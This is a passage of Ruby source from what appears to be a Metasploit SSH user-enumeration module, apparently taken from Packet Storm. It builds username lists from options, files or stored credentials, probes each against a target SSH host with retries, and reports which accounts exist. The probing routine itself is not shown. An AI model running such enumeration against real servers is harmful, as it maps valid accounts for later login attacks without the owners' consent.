Because this isn't using the AuthBrute mixin, we don't have the  # usual peer method  def peer(rhost = nil)    "#{rhost}:#{rport} - SSH -"  end  def user_list    users = []    users << datastore['USERNAME'] unless datastore['USERNAME'].blank?    if datastore['USER_FILE']      fail_with(Failure::BadConfig, 'The USER_FILE is not readable') unless File.readable?(datastore['USER_FILE'])      users += File.read(datastore['USER_FILE']).split    end    if datastore['DB_ALL_USERS']      if framework.db.active        framework.db.creds(workspace: myworkspace.name).each do |o|          users << o.public.username if o.public        end      else        print_warning('No active DB -- The following option will be ignored: DB_ALL_USERS')      end    end    users.uniq  end  def attempt_user(user, ip)    attempt_num = 0    ret = nil    while (attempt_num <= retry_num) && (ret.nil? || (ret == :connection_error))      if attempt_num > 0        Rex.sleep(2**attempt_num)        vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")      end      ret = check_user(ip, user, rport)      attempt_num += 1    end    ret  end  def show_result(attempt_result, user, ip)    case attempt_result    when :success      print_good("#{peer(ip)} User '#{user}' found")      do_report(ip, user, rport)    when :connection_error      vprint_error("#{peer(ip)} User '#{user}' could not connect")    when :fail      vprint_error("#{peer(ip)} User '#{user}' not found")    end  end  def run    if user_list.empty?      fail_with(Failure::BadConfig, 'Please populate DB_ALL_USERS, USER_FILE, USERNAME')    end    super  end  def run_host(ip)    print_status("#{peer(ip)} Using #{action.name.downcase} technique")    if datastore['CHECK_FALSE']      print_status("#{peer(ip)} Checking for false positives")      if check_false_positive(ip)        print_error("#{peer(ip)} throws false positive results. Aborting.")        return      end    end    users = user_list    print_status("#{peer(ip)} Starting scan")    users.each { |user| show_result(attempt_user(user, ip), user, ip) }  endend

Source

Packet Storm